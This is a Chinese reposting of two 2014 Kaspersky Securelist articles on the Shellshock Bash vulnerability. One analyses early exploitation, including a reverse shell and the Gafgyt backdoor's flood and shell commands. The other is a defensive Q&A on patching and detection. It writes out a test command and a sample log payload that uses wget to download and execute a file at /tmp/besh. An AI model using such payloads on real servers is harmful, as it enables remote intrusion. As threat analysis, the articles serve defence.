Shellshock弱點和最先利用弱點進行攻擊的惡意程式
什麼是Bash弱點 (CVE-2014-6271) – Q & A


就在公開Bash弱點(亦稱為Shellshock)之後不久,我們便發現到第一個利用(CVE-2014-6271)弱點進行攻擊的網路罪犯出現。 在最近一次的攻擊案例中,我們看到網路罪犯為取得網頁伺服器的控制權限,建立了一組新的Bash指令,將其重新導向到遠端伺服器監控特定的TCP連接埠。這類型的攻擊手法稱為(reverse-connect-shell)。在以下的範例,將顯示出伺服器事件記錄中的受攻擊訊息: 攻擊者監聽IP位址195.xx.xx.101上的TCP連接埠3333,而攻擊來源的IP位址則是94.xx.xx.131。使用這個方式取得伺服器權限,不需呼叫額外的程式服務。 另一種攻擊方式,犯罪份子是使用特製的HTTP請求,利用Bash弱點在伺服器上安裝Linux的木馬程式。在受害的伺服器上,我們也偵測出(Backdoor.Linux.Gafgyt)惡意程式和變種病毒。 在二進制程序代碼中包含兩組寫死原始碼的IP位址。第一個位址是用來通知攻擊者已成功感染。第二個位址則是做為命令和控制伺服器(C & C),在受害的伺服器上安裝惡意程式進行通訊連線。 以下圖片中顯示出惡意程式的通訊過程: 在第1行中惡意程式發送了一組“Hello”訊息,並告訴攻擊者可在任何架構上編輯二進制程序代碼 – 此處顯示的為x86架構。 除了執行攻擊者傳送的命令之外,木馬程式還會每隔30秒發送“PING”指令,而由伺服器回應“PONG”指令(為了讓畫面容易閱讀,我們刪除了部分PING/ PONG的指令回應)。 所有指令都是由"!* "做為開頭。上述範例中的第一組指令為"SCANNER ON",這一指令會掃描隨機的IP範圍,尋找在TCP連接埠23上等待連線的Telnet主機。若發現到此類型的主機,惡意程式將會嘗試使用原始碼清單中常見的預設帳號/密碼來進行登入。 除此之外,惡意程式中還包含了一組利用"busybox"的誘捕系統(honeypot)。有關"busybox"的資訊,請參閱Internet Storm Center。 網路罪犯在伺服器上是透過第14行的指令執行下一個工作。 這一項指令會通知程序使用UDP協定針對IP 69.xx.xx.67 執行50秒的阻斷服務攻擊(Flooding)。在第17行下指令停止,並在第18行重新啟動,針對的IP位址則為178.x.x.241。第21行顯示的"None Killed."回覆訊息,是因為第14行的攻擊指令在攻擊者於第17行執行"!* KILLATTK"時,已經執行完畢。 以下是木馬接受指令的完整清單: !* PING – Replies with "PONG!"
!* SH - Execute arbitrary shell command
!* GETLOCALIP – Replies with "My IP: $ipaddr"
!* SCANNER ON | OFF - Scan random networks, perform a very small dictionary attack (see above), test if target is a honeypot
!* HOLD - Hold flooding
!* JUNK – Perform junk flood
!* UDP – Perform udp flood
!* TCP – Perform tcp flood
!* KILLATTK - Kill all flood
!* LOLNOGTFO – Terminate backdoor.
相關的二進制程序代碼: 73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489
2d3e0be24ef668b85ed48e81ebb50dce50612fb8dce96879f80306701bc41614
ae3b4f296957ee0a208003569647f04e585775be1f3992921af996b320cf520b

0fde4c72038189e3d86676d84a1370787bcd284f98d1dff7736707fe05af7d9a
3b13eef9b24919dc7e7071068a83defcc4808a41dc86fadf039e08dce1107f7d
64b3751182be737c005fb04ffbe8b4dfe5930ed46066e87a9f6344de1d9985b8
資安知識不可少,小心謹慎保荷包!掌握個人資訊安全,湛揚科技將與您同步關心。 【文章來源:http://securelist.com/blog/research/66719/shellshock-and-its-early-adopters Stefan Ortloff 主題:Shellshock弱點和最先利用弱點進行攻擊的惡意程式 發文時間:2014/9/26


Bash弱點 (CVE-2014-6271) – Q & A 什麼是"bash"弱點? "bash"弱點(CVE-2014-6271)是一個影響層面廣泛且容易遭受利用的嚴重弱點,攻擊者可以很簡單就取得相關服務的控制權限來執行系統層級的指令。 在目前網際網路大多數的案例來看,攻擊者都是遠端攻擊指令碼(例如:CGI scripts)含有弱點的網頁伺服器。在撰寫本報告的同時,已經有人開始利用弱點發動惡意攻擊 – 透過惡意程式感染具有弱點的網頁伺服器、或是直接進行攻擊行為。 我們的分析師正在不斷收集新樣本和分析弱點的感染症狀;預計將在近期發佈相關惡意程式的詳細資訊。 其中更應瞭解的關鍵是,此弱點並沒有綁定在特定的服務(例如:Apache或nginx)。而是透過Bash shell編輯器,來允許攻擊者新增系統層級的環境變數。 如何利用弱點執行工作? 我們將會透過之前介紹和驗證時所採用的案例,來解說工作原理。在您網頁伺服器中具有CGI script時,這個script將會自動讀取特定的系統環境變數(例如:IP位址、瀏覽器版本、和本機資訊)。 但試想一下在此情況,您不僅可以將正常的系統訊息傳送給CGI script,也可以利用script來執行系統指令。這也表示 – 不需使用任何憑證或帳號登入到網頁伺服器 - 只要存取CGI script就能讀取您的環境變數;如果這些環境變數包含利用弱點的惡意代碼,script也將會執行指定的工作指令。 此弱點有何特點? 此弱點最特殊的地方在於,除了容易遭受利用外,主要原因是這項弱點可以影響的範圍相當廣泛。不僅僅是影響到網頁伺服器,還影響到所有使用Bash編輯器的軟體,讓攻擊者可在受影響的系統中進行資料讀取和權限控制。 目前分析師也在試圖找出是否有影響到其他編譯器,例如,PHP、JSP、Python或Perl。不過這取決於程式碼編譯時的定義方式,因為有時候可能需要使用Bash來執行特定功能;如果有此情況的話,將可能也會受到CVE-2014-6271弱點的影響。 這個影響的另一個嚴重性在於,許多嵌入式設備都有使用CGI scripts – 包含路由器、家電、無線熱點。它們同樣也存在問題,但在許多情況下,這些項目很難進行修補。 弱點的散佈情況為何? 依現況還很難斷定,但由我們情資系統蒐集的資料來看,這項弱點資訊一公開之後,就開始有人著手針對弱點開發惡意程式和病毒蠕蟲。目前,whitehat 和blackhat 分析師還都在網際網路上,積極尋找存在弱點的伺服器。 所以現在討論散佈情況可能還言之過早,但根據研究資料顯示,網際網路上存在許多執行CGI scripts的網頁伺服器,因此可以預見的是,網路上將會陸續有利用弱點,針對本機檔案和自動在背景執行惡意程式的新型態攻擊手法出現。此外,還有相關討論認為OpenSSH和DHCP-clients同樣也在此弱點的影響範圍內。 如何檢查自己的系統/網站是否受到感染? 若要檢查您的系統是否存在弱點,最簡單的方式就是開啟Bash-shell,並執行以下指令: "env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 如果shell回傳的字串為"vulnerable",則建議盡快更新您的系統。 另外,還有一些檢測工具,也是可以用來確認您的伺服器是否有受到此弱點的影響。 修正弱點的建議方式 首先第一項要做的事,就是請更新您的Bash版本。不同版本的Linux都有針對此弱點發佈安全性更新;雖然,並沒有文獻證明所有的安全性更新能完全防堵弱點,但安裝安全性更新也是需要優先進行。就像Heroku服務平台已推出自動在24小時內套用修補程式,不過開發者本身也可以自行強制更新。 如果您也有使用IDS/IPS服務,也建議您新增/載入針對此弱點的特徵碼。許多針對此弱點的安全政策已被發佈。 同時請檢查您網頁伺服器的設定。如果有任何目前沒有在使用的CGI scripts,建議您可以先進行停用。 是否會影響到網路銀行的使用? 此漏洞主要是被利用來攻擊網際網路上的伺服器。即使是工作站上執行的Linux 或 OSX 存在弱點,攻擊者如果想要遠端入侵您的電腦桌面,仍然需要尋找可以進行攻擊入侵的點。 但Bash漏洞可能也會影響您常用的電子商務網站,透過取得伺服器權限後,竊取您的個人資料或是信用卡資訊。不過截至撰文之時,我們尚未能確認哪些商務網站有確實受到攻擊。因此建議您暫時減少使用電子商務的機會,並且在使用前先更新相關的應用程式。 如何自我檢測是否有遭受弱點攻擊? 我們建議先檢查您的HTTP記錄,是否包含任何異常的訊息。以下為包含惡意代碼的範例: 192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;" 也有一些針對Bash的安全性更新,能記錄每一個傳送到Bash編譯器的指令。透過這項功能,可以查看是否有人對您的伺服器進行攻擊。特別需要注意的是,這項功能並不會阻擋利用弱點的惡意攻擊,但是會將攻擊行為記錄在系統上。 威脅攻擊的嚴重程度為何? 此弱點攻擊的威脅層級相當高,但並不是每個系統都會受到影響。若要進行網頁伺服器弱點攻擊,也必須符合特定的條件才能達成。現在所面臨到的最大問題是,雖然已經發佈安全性更新,但病毒分析師仍需要找尋利用Bash工具弱點進行的其他攻擊類型,以及其它能夠達成攻擊的條件。因為,阻擋遠端執行指令碼的安全性更新,並不能防堵其他類型的弱點攻擊,例如,檔案覆蓋。所以後續可能會再發佈其他類型的安全性更新,在安裝更新之前的空窗期,系統仍會有潛在的安全問題。 這項弱點是否會成為新的Heartbleed? 網路罪犯想要利用這項弱點發動攻擊將會比Heartbleed更加容易。此外,透過Heartbleed弱點,犯罪者僅能從記憶體中擷取資料,並且在這個資料範圍中找尋可用的資料。而Bash弱點是可以讓犯罪者取得系統資料和控制權限。由此可知,Bash弱點將比Heartbleed更加危險。 它是否會在之後被利用在APT攻擊上? 它很有可能被利用在往後的APT攻擊當中,此類型的惡意程式可自動搜尋系統是否存在此弱點,利用弱點來感染系統或進行其他攻擊。 資安知識不可少,小心謹慎保荷包!掌握個人資訊安全,湛揚科技將與您同步關心。 【文章來源:http://securelist.com/blog/research/66673/bash-cve-2014-6271-vulnerability-qa-2/ 卡巴斯基全球威脅分析團隊 主題:Bash弱點 (CVE-2014-6271) – Q & A 發文時間:2014/9/25